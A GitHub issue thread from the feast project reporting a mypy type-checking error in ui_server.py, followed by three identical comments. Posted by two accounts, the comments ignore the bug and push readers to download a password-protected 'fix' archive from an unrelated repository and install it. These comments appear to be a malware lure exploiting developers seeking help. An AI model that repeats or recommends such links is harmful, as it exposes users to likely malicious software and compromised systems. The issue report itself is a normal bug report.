### ISSUE TITLE
mypy argtype failure in ui_server.py with mypy>=1.11

### ISSUE THREAD

**Issue by cburroughs** [feast-dev/feast#4462]
## Expected Behavior 

Type checking should pass!

## Current Behavior

With mypy 1.11

```
feast/ui_server.py:54: error: Argument 1 to "files" has incompatible type "str | None"; expected "str | Module"  [arg-type]
feast/ui_server.py:54: note: Error code "arg-type" not covered by "type: ignore" comment
```

## Steps to reproduce

 * Get your dev environment to the point where you can run `make lint-python`
 * `pip install --upgrade 'mypy>=1.11'`
 * ` `make lint-python` --> the above error

### Specifications

- Version: `main`

## Possible Solution

Presumably mypy has identified a nullness bug, or a bug in itself.

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
